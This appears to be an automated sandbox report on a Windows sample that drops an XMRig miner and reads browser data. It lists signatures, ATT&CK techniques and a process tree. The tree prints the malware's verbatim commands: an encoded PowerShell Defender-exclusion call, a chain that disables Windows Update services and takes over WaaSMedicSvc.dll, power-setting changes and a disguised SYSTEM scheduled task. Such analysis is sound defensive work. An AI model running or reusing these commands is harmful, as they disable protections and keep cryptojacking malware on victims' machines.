xmrig | 769e759ab44a310c6b44f1da3a5f895cab0e33f7bccd1428d09f344587eaec48

Analysis

max time kernel
148s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
04-05-2022 12:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

769e759ab44a310c6b44f1da3a5f895cab0e33f7bccd1428d09f344587eaec48.exe
Size

184KB
MD5

03bc0abedf428f004fb59b738d2c2923
SHA1

f2e1f9a0eabb21c4287114ef4062cb3389cce2c8
SHA256

769e759ab44a310c6b44f1da3a5f895cab0e33f7bccd1428d09f344587eaec48
SHA512

cb1344fbc66d84e467bb16f41f7a41c55130e51be4a642364376b28139170234a3ec46cb84eedbf7b5a0fb3adc4191f536ae8f0c05598be4aac0cd4aaa25e372

Score

10^/10

xmrig discovery evasion exploit miner spyware stealer suricata

Malware Config

Signatures

suricata: ET MALWARE Observed Zingo/GinzoStealer CnC Domain (nominally .ru in TLS SNI)
suricata: ET MALWARE Observed Zingo/GinzoStealer CnC Domain (nominally .ru in TLS SNI)
suricata
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner Payload 5 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/4984-228-0x0000000140000000-0x0000000140803000-memory.dmp	xmrig
behavioral1/memory/4984-230-0x0000000140000000-0x0000000140803000-memory.dmp	xmrig
behavioral1/memory/4984-229-0x000000014036DAD4-mapping.dmp	xmrig
behavioral1/memory/4984-231-0x0000000140000000-0x0000000140803000-memory.dmp	xmrig
behavioral1/memory/4984-233-0x0000000140000000-0x0000000140803000-memory.dmp	xmrig

Downloads MZ/PE file
Executes dropped EXE 2 IoCs

Processes:

838029.exeupdater.exe

pid process

4220 838029.exe
1332 updater.exe
Possible privilege escalation attempt 4 IoCs
exploit

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

2664 takeown.exe
240 icacls.exe
2332 takeown.exe
4564 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

pid	process
4220	838029.exe
1332	updater.exe

pid	process
2664	takeown.exe
240	icacls.exe
2332	takeown.exe
4564	icacls.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

769e759ab44a310c6b44f1da3a5f895cab0e33f7bccd1428d09f344587eaec48.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation	769e759ab44a310c6b44f1da3a5f895cab0e33f7bccd1428d09f344587eaec48.exe

Loads dropped DLL 7 IoCs

Processes:

769e759ab44a310c6b44f1da3a5f895cab0e33f7bccd1428d09f344587eaec48.exe

pid	process
2892	769e759ab44a310c6b44f1da3a5f895cab0e33f7bccd1428d09f344587eaec48.exe
2892	769e759ab44a310c6b44f1da3a5f895cab0e33f7bccd1428d09f344587eaec48.exe
2892	769e759ab44a310c6b44f1da3a5f895cab0e33f7bccd1428d09f344587eaec48.exe
2892	769e759ab44a310c6b44f1da3a5f895cab0e33f7bccd1428d09f344587eaec48.exe
2892	769e759ab44a310c6b44f1da3a5f895cab0e33f7bccd1428d09f344587eaec48.exe
2892	769e759ab44a310c6b44f1da3a5f895cab0e33f7bccd1428d09f344587eaec48.exe
2892	769e759ab44a310c6b44f1da3a5f895cab0e33f7bccd1428d09f344587eaec48.exe

Modifies file permissions 1 TTPs 4 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exetakeown.exeicacls.exetakeown.exe

pid process

4564 icacls.exe
2664 takeown.exe
240 icacls.exe
2332 takeown.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

16 freegeoip.app
17 freegeoip.app

pid	process
4564	icacls.exe
2664	takeown.exe
240	icacls.exe
2332	takeown.exe

flow	ioc
16	freegeoip.app
17	freegeoip.app

Suspicious use of SetThreadContext 2 IoCs

Processes:

conhost.exe

description	pid	process	target process
PID 2744 set thread context of 2320	2744	conhost.exe	conhost.exe
PID 2744 set thread context of 4984	2744	conhost.exe	explorer.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

769e759ab44a310c6b44f1da3a5f895cab0e33f7bccd1428d09f344587eaec48.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	769e759ab44a310c6b44f1da3a5f895cab0e33f7bccd1428d09f344587eaec48.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	769e759ab44a310c6b44f1da3a5f895cab0e33f7bccd1428d09f344587eaec48.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

964 schtasks.exe
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.execonhost.exepowershell.execonhost.exe

pid process

2348 powershell.exe
2348 powershell.exe
2220 conhost.exe
3260 powershell.exe
3260 powershell.exe
2744 conhost.exe
Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

660

pid	process
964	schtasks.exe

pid	process
2348	powershell.exe
2348	powershell.exe
2220	conhost.exe
3260	powershell.exe
3260	powershell.exe
2744	conhost.exe

pid	process
660

Suspicious use of AdjustPrivilegeToken 23 IoCs

Processes:

769e759ab44a310c6b44f1da3a5f895cab0e33f7bccd1428d09f344587eaec48.exepowershell.execonhost.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.execonhost.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exeexplorer.exe

description	pid	process
Token: SeDebugPrivilege	2892	769e759ab44a310c6b44f1da3a5f895cab0e33f7bccd1428d09f344587eaec48.exe
Token: SeDebugPrivilege	2348	powershell.exe
Token: SeDebugPrivilege	2220	conhost.exe
Token: SeShutdownPrivilege	3928	powercfg.exe
Token: SeCreatePagefilePrivilege	3928	powercfg.exe
Token: SeShutdownPrivilege	4776	powercfg.exe
Token: SeCreatePagefilePrivilege	4776	powercfg.exe
Token: SeShutdownPrivilege	4884	powercfg.exe
Token: SeCreatePagefilePrivilege	4884	powercfg.exe
Token: SeShutdownPrivilege	4700	powercfg.exe
Token: SeCreatePagefilePrivilege	4700	powercfg.exe
Token: SeDebugPrivilege	3260	powershell.exe
Token: SeDebugPrivilege	2744	conhost.exe
Token: SeShutdownPrivilege	4636	powercfg.exe
Token: SeCreatePagefilePrivilege	4636	powercfg.exe
Token: SeShutdownPrivilege	2948	powercfg.exe
Token: SeCreatePagefilePrivilege	2948	powercfg.exe
Token: SeShutdownPrivilege	2284	powercfg.exe
Token: SeCreatePagefilePrivilege	2284	powercfg.exe
Token: SeShutdownPrivilege	3116	powercfg.exe
Token: SeCreatePagefilePrivilege	3116	powercfg.exe
Token: SeLockMemoryPrivilege	4984	explorer.exe
Token: SeLockMemoryPrivilege	4984	explorer.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

769e759ab44a310c6b44f1da3a5f895cab0e33f7bccd1428d09f344587eaec48.exe838029.execonhost.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 2892 wrote to memory of 4220	2892	769e759ab44a310c6b44f1da3a5f895cab0e33f7bccd1428d09f344587eaec48.exe	838029.exe
PID 2892 wrote to memory of 4220	2892	769e759ab44a310c6b44f1da3a5f895cab0e33f7bccd1428d09f344587eaec48.exe	838029.exe
PID 4220 wrote to memory of 2220	4220	838029.exe	conhost.exe
PID 4220 wrote to memory of 2220	4220	838029.exe	conhost.exe
PID 4220 wrote to memory of 2220	4220	838029.exe	conhost.exe
PID 2220 wrote to memory of 1936	2220	conhost.exe	cmd.exe
PID 2220 wrote to memory of 1936	2220	conhost.exe	cmd.exe
PID 1936 wrote to memory of 2348	1936	cmd.exe	powershell.exe
PID 1936 wrote to memory of 2348	1936	cmd.exe	powershell.exe
PID 2220 wrote to memory of 3496	2220	conhost.exe	cmd.exe
PID 2220 wrote to memory of 3496	2220	conhost.exe	cmd.exe
PID 2220 wrote to memory of 2060	2220	conhost.exe	cmd.exe
PID 2220 wrote to memory of 2060	2220	conhost.exe	cmd.exe
PID 3496 wrote to memory of 2132	3496	cmd.exe	sc.exe
PID 3496 wrote to memory of 2132	3496	cmd.exe	sc.exe
PID 2060 wrote to memory of 3928	2060	cmd.exe	powercfg.exe
PID 2060 wrote to memory of 3928	2060	cmd.exe	powercfg.exe
PID 3496 wrote to memory of 4692	3496	cmd.exe	sc.exe
PID 3496 wrote to memory of 4692	3496	cmd.exe	sc.exe
PID 2060 wrote to memory of 4776	2060	cmd.exe	powercfg.exe
PID 2060 wrote to memory of 4776	2060	cmd.exe	powercfg.exe
PID 3496 wrote to memory of 4104	3496	cmd.exe	sc.exe
PID 3496 wrote to memory of 4104	3496	cmd.exe	sc.exe
PID 2060 wrote to memory of 4884	2060	cmd.exe	powercfg.exe
PID 2060 wrote to memory of 4884	2060	cmd.exe	powercfg.exe
PID 3496 wrote to memory of 2320	3496	cmd.exe	sc.exe
PID 3496 wrote to memory of 2320	3496	cmd.exe	sc.exe
PID 2060 wrote to memory of 4700	2060	cmd.exe	powercfg.exe
PID 2060 wrote to memory of 4700	2060	cmd.exe	powercfg.exe
PID 3496 wrote to memory of 2036	3496	cmd.exe	sc.exe
PID 3496 wrote to memory of 2036	3496	cmd.exe	sc.exe
PID 2220 wrote to memory of 3408	2220	conhost.exe	cmd.exe
PID 2220 wrote to memory of 3408	2220	conhost.exe	cmd.exe
PID 3496 wrote to memory of 796	3496	cmd.exe	sc.exe
PID 3496 wrote to memory of 796	3496	cmd.exe	sc.exe
PID 3408 wrote to memory of 964	3408	cmd.exe	schtasks.exe
PID 3408 wrote to memory of 964	3408	cmd.exe	schtasks.exe
PID 3496 wrote to memory of 4780	3496	cmd.exe	sc.exe
PID 3496 wrote to memory of 4780	3496	cmd.exe	sc.exe
PID 3496 wrote to memory of 4416	3496	cmd.exe	sc.exe
PID 3496 wrote to memory of 4416	3496	cmd.exe	sc.exe
PID 3496 wrote to memory of 4984	3496	cmd.exe	sc.exe
PID 3496 wrote to memory of 4984	3496	cmd.exe	sc.exe
PID 3496 wrote to memory of 4896	3496	cmd.exe	sc.exe
PID 3496 wrote to memory of 4896	3496	cmd.exe	sc.exe
PID 3496 wrote to memory of 3964	3496	cmd.exe	sc.exe
PID 3496 wrote to memory of 3964	3496	cmd.exe	sc.exe
PID 3496 wrote to memory of 968	3496	cmd.exe	sc.exe
PID 3496 wrote to memory of 968	3496	cmd.exe	sc.exe
PID 3496 wrote to memory of 4388	3496	cmd.exe	sc.exe
PID 3496 wrote to memory of 4388	3496	cmd.exe	sc.exe
PID 3496 wrote to memory of 3328	3496	cmd.exe	sc.exe
PID 3496 wrote to memory of 3328	3496	cmd.exe	sc.exe
PID 3496 wrote to memory of 2096	3496	cmd.exe	sc.exe
PID 3496 wrote to memory of 2096	3496	cmd.exe	sc.exe
PID 3496 wrote to memory of 2664	3496	cmd.exe	takeown.exe
PID 3496 wrote to memory of 2664	3496	cmd.exe	takeown.exe
PID 3496 wrote to memory of 240	3496	cmd.exe	icacls.exe
PID 3496 wrote to memory of 240	3496	cmd.exe	icacls.exe
PID 3496 wrote to memory of 3564	3496	cmd.exe	reg.exe
PID 3496 wrote to memory of 3564	3496	cmd.exe	reg.exe
PID 3496 wrote to memory of 2616	3496	cmd.exe	reg.exe
PID 3496 wrote to memory of 2616	3496	cmd.exe	reg.exe
PID 3496 wrote to memory of 4588	3496	cmd.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\769e759ab44a310c6b44f1da3a5f895cab0e33f7bccd1428d09f344587eaec48.exe
"C:\Users\Admin\AppData\Local\Temp\769e759ab44a310c6b44f1da3a5f895cab0e33f7bccd1428d09f344587eaec48.exe"
1⤵
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2892

C:\Users\Admin\AppData\Local\838029.exe
"C:\Users\Admin\AppData\Local\838029.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4220

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\838029.exe"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2220

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHEAeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAaABiACMAPgA="
4⤵
- Suspicious use of WriteProcessMemory
PID:1936

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAHEAeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAaABiACMAPgA="
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2348

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
4⤵
- Suspicious use of WriteProcessMemory
PID:3496

C:\Windows\system32\sc.exe
sc stop wuauserv
5⤵
PID:2132

C:\Windows\system32\sc.exe
sc stop bits
5⤵
PID:4692

C:\Windows\system32\sc.exe
sc stop dosvc
5⤵
PID:4104

C:\Windows\system32\sc.exe
sc stop UsoSvc
5⤵
PID:2320

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
5⤵
PID:2036

C:\Windows\system32\sc.exe
sc config wuauserv start= disabled
5⤵
PID:796

C:\Windows\system32\sc.exe
sc failure wuauserv reset= 0 actions= ""
5⤵
PID:4780

C:\Windows\system32\sc.exe
sc config bits start= disabled
5⤵
PID:4416

C:\Windows\system32\sc.exe
sc failure bits reset= 0 actions= ""
5⤵
PID:4984

C:\Windows\system32\sc.exe
sc config dosvc start= disabled
5⤵
PID:4896

C:\Windows\system32\sc.exe
sc failure dosvc reset= 0 actions= ""
5⤵
PID:3964

C:\Windows\system32\sc.exe
sc config UsoSvc start= disabled
5⤵
PID:968

C:\Windows\system32\sc.exe
sc failure UsoSvc reset= 0 actions= ""
5⤵
PID:4388

C:\Windows\system32\sc.exe
sc config wuauserv start= disabled
5⤵
PID:3328

C:\Windows\system32\sc.exe
sc failure wuauserv reset= 0 actions= ""
5⤵
PID:2096

C:\Windows\system32\takeown.exe
takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2664

C:\Windows\system32\icacls.exe
icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:240

C:\Windows\system32\reg.exe
reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
5⤵
PID:3564

C:\Windows\system32\reg.exe
reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
5⤵
PID:2616

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f
5⤵
PID:4588

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
5⤵
PID:1668

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
5⤵
PID:3568

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
5⤵
PID:2512

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE
5⤵
PID:4444

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE
5⤵
PID:1560

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE
5⤵
PID:2420

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE
5⤵
PID:2432

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE
5⤵
PID:1152

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE
5⤵
PID:2052

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
5⤵
PID:1180

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
4⤵
- Suspicious use of WriteProcessMemory
PID:2060

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3928

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4776

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4884

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4700

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"
4⤵
- Suspicious use of WriteProcessMemory
PID:3408

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"
5⤵
- Creates scheduled task(s)
PID:964

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"
4⤵
PID:2808

C:\Users\Admin\AppData\Roaming\Chrome\updater.exe
C:\Users\Admin\AppData\Roaming\Chrome\updater.exe
5⤵
- Executes dropped EXE
PID:1332

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"
6⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2744

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHEAeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAaABiACMAPgA="
7⤵
PID:3620

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -EncodedCommand "PAAjAHEAeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAaABiACMAPgA="
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3260

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
7⤵
PID:4040

C:\Windows\system32\sc.exe
sc stop wuauserv
8⤵
PID:1392

C:\Windows\system32\sc.exe
sc stop bits
8⤵
PID:4104

C:\Windows\system32\sc.exe
sc stop dosvc
8⤵
PID:4440

C:\Windows\system32\sc.exe
sc stop UsoSvc
8⤵
PID:1956

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
8⤵
PID:796

C:\Windows\system32\sc.exe
sc config wuauserv start= disabled
8⤵
PID:964

C:\Windows\system32\sc.exe
sc failure wuauserv reset= 0 actions= ""
8⤵
PID:3500

C:\Windows\system32\sc.exe
sc config bits start= disabled
8⤵
PID:1524

C:\Windows\system32\sc.exe
sc failure bits reset= 0 actions= ""
8⤵
PID:4256

C:\Windows\system32\sc.exe
sc config dosvc start= disabled
8⤵
PID:3520

C:\Windows\system32\sc.exe
sc failure dosvc reset= 0 actions= ""
8⤵
PID:3316

C:\Windows\system32\sc.exe
sc config UsoSvc start= disabled
8⤵
PID:2068

C:\Windows\system32\takeown.exe
takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll
8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2332

C:\Windows\system32\icacls.exe
icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4564

C:\Windows\system32\sc.exe
sc failure wuauserv reset= 0 actions= ""
8⤵
PID:3948

C:\Windows\system32\sc.exe
sc config wuauserv start= disabled
8⤵
PID:2096

C:\Windows\system32\sc.exe
sc failure UsoSvc reset= 0 actions= ""
8⤵
PID:2136

C:\Windows\system32\reg.exe
reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
8⤵
PID:4352

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
8⤵
PID:1856

C:\Windows\system32\reg.exe
reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
8⤵
PID:4480

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE
8⤵
PID:628

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE
8⤵
PID:4484

